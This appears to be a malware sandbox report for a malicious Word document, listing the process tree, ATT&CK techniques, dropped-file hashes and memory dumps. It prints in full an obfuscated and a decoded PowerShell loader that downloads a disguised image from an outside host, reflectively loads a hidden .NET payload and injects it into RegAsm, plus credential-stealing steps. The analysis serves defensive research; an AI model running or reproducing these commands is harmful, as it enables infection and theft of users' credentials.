"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBCDgTreE0DgTreUgDgTrevDgTreG0DgTreYgBrDgTreC8DgTrecDgTreBwDgTreG0DgTreYQB4DgTreC8DgTreMwDgTrexDgTreDIDgTreLgDgTreyDgTreDYDgTreMQDgTreuDgTreDcDgTreNgDgTreuDgTreDMDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBSDgTreE0DgTreQgDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BMR/mbk/ppmax/312.261.76.301//:ptth' , '1' , 'C:\ProgramData\' , 'RMB','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\RMB.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\lwyhzsfamwqqvnyxdvrqfbehgoichsmf"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:488

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\wyla"
6⤵
- Accesses Microsoft Outlook accounts
PID:556

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ysqtbdbw"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c0f9898fc32f28ac0d1044827d41a292

SHA1
8203f13e785c94ef8cbed5b4a1371829fbda85e8

SHA256
0c41da3792558509f17bd3db1b16d0b0a60d694d69e85aa890e8dca3bc3887b8

SHA512
77966d4ae5f26ae606ea329f97420dbaad25b4eb1dbc77f100c75c3909b30299eeabc87774d6fbe375f989a586e5a89f7803877b0b466273ec3ac61e765a3264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9B9F2DC9-7A01-402E-B07E-BD869DC324F8}.FSD

Filesize
128KB

MD5
7e37d0fabb9a7a162a001cc0756334b3

SHA1
b8441957891340fb787172e5ebe150368a9c362e

SHA256
66c9bfbb8d6124c55199f52af5278c382953116484eec70c5ad52d9c2ace3887

SHA512
09769062090a6a899094ad8b2b5f9dea82bb06cc5fb038a00372cdaa5b48e5a74f28a36a4643aa194f1169b076c7b3fdc3b31814fd73e6fa488013444a76c1de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
ff9f3e5680c3b90fbcb508230f0e868c

SHA1
bcc6f1976a626e9352eaa60db9078a72c53ecf82

SHA256
09c224b99f81e4ad0a660f45527565d90f6c734a05e0132fcbfcf80aebae9d88

SHA512
053a26c347fc7dc418a4183bda3788784e8d90701640dd993555bf9122213d17e001bc656fca397f3d36c824d5cac229dae97f60060619992c7ba9775e3d5ad3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FAC1519D-7490-4803-B6BB-6D07233EFA52}.FSD

Filesize
128KB

MD5
7d7f6beb7bb6ab0ab64d2df1e8424136

SHA1
7507de4a5da0300da15244054ec1163a3c7ec11d

SHA256
0340e7d01ec37e0d6581b7adf57999738c7b927936aed2ac15b510a57e2a047d

SHA512
c806a0f3e96b1dcb60786eb0f2c6a9106eec2c32c98c42c686f1d5678c87cc0b717f554d01c858eae6fd16de98619b98c1cec0f94fce8d748fd4198ae5949133

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\ilovehimtrulyfrommediafxpixelhandtreatedbymediapixelnetworkstilleverythinggodd____sweetkissigivenheronneckandfacetoget[1].doc

Filesize
61KB

MD5
e7b1dab5d64b8e37ab2c8b0a05fd486c

SHA1
5ae4d3a7dec17b9740d4573e8f1014769e683f79

SHA256
fc8d8e349b245c33b43169523d6d8ebbc617f07d3ec592bc71eccba272a53bed

SHA512
1d68bb3e96612a9dca2a7d7dbfcf17297e0c39ed6e9dd7425c21176723393dfbbf6133c7cf1441e1a971fe8d46b89d08fda9fab02679efe24e70948d187ff710

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab899A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar89AC.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8CBE.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\lwyhzsfamwqqvnyxdvrqfbehgoichsmf

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{7D12256C-B74D-480C-B539-05BECABD7B4B}

Filesize
128KB

MD5
3f66fa7c1288baec5b57eafb18c39c56

SHA1
48ede4d62a8e21fd2cf9637a4210e614a3e9b89f

SHA256
4de3c6ec009ff049d9368dd10a9b9feff48d69f4f6231f9d8cc27617df152cea

SHA512
7d41570f9b933cba8de9ffe16decae641ab7c6c4629b054db2bf2123100371bf1bd8d432d4bd0686ec06c644f671893761162654946d94250889efd1bca4b85c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9f132bf69bfb689c93e0f222e485e52e

SHA1
7f47380d08c310291e58fe920506c4da6970b00b

SHA256
880c16fe2a890e4cb72d08ccadccbd44d3a46346e1d112bce3e909e73846b604

SHA512
69df6874518562d98229ec936a3f29fec5e9d317c81c4fd51ee97dd84b1655996e872be1a35c8c49b3b906527499269770a2ea8cb4e8c3f99e32dca394971cd8

Download Submit
C:\Users\Admin\AppData\Roaming\imaginepixelmediakiss.vbs

Filesize
402KB

MD5
bbe7fe42c4dcb5aeda55e077e99e6641

SHA1
4de2f7bd292f39fc3a01827144dedd42dd9b6f89

SHA256
635c980370b6300f0573205607658d335a7fc0dc9d864e0cb9ba671bfd7b4b31

SHA512
b703fe6f256d4067349514ad5d752d1a0f11adb5d58ff14c7df164389f4ccafdbe3ac78e564f46f8937d37733a1c408cdf82658a9b2a7e641f44348792626edf

Download Submit
memory/488-282-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/488-294-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/488-295-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/488-276-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/488-309-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/488-288-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/556-317-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/556-298-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/556-293-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/556-279-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/556-284-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/556-290-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1284-234-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1284-123-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1284-233-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1284-260-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1284-124-0x0000000002AF0000-0x0000000002B30000-memory.dmp

Filesize
256KB

Download
memory/1284-125-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1284-127-0x0000000002AF0000-0x0000000002B30000-memory.dmp

Filesize
256KB

Download
memory/1284-126-0x0000000069CA0000-0x000000006A24B000-memory.dmp

Filesize
5.7MB

Download
memory/1412-300-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1412-289-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1412-303-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1412-301-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1412-296-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1412-304-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1552-243-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-270-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-239-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-321-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1552-241-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-245-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-247-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-249-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-251-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-253-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1552-255-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-257-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-259-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-316-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1552-261-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-263-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-262-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-311-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1552-265-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-266-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1552-267-0x0000000000400000-0x0000000000482000-memory.dmp

